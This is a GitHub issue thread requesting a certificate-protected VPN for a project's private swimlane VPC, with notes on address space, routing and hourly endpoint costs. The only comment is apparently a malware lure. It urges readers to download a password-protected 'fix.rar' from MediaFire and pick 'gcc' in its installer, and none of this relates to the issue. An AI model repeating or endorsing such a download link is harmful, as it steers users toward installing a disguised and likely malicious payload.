### ISSUE TITLE
Add private swimlane VPN

### ISSUE THREAD

**Issue by thecaffiend** [cape-ph/cape-cod#92]
We need this for a few things at least in the short term (e.g. access to initial web forms for kicking off pipelines). Try to keep it easily removable in the event we go away from it in the future.

VPN should be:
* private swimlane only (use its vpc)
* cert protected for now (we'll want this as easy to manage as possible for now, with one key/cert pair for all devs created at deploy time...no ad/ldap integrations or anything)
* should have a cidr block that can route to the eventual web forms. those will be deployed after this, so just need to keep in mind we'll need enough address space for a small number of IPs (max all folk vpn'ed at same time as well as web forms)
* VPN IPs will not need to route to the compute environment at this time. we may want to change that if we want to be able to ssh to the head nodes and such.

***NOTE:*** Relatively speaking, VPN costs a fair amount and is billed by the hour for the endpoint existing and then also by the hour for a connection (both minimum of 1 hour billing). So we will not want to just leave this up and running all the time or we'll incur a decent amount of cost. An endpoint ($0.10/hr) with one active connection ($0.05/hr) for a 30 day month would cost $108.

**Comment by c0ffincolors** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
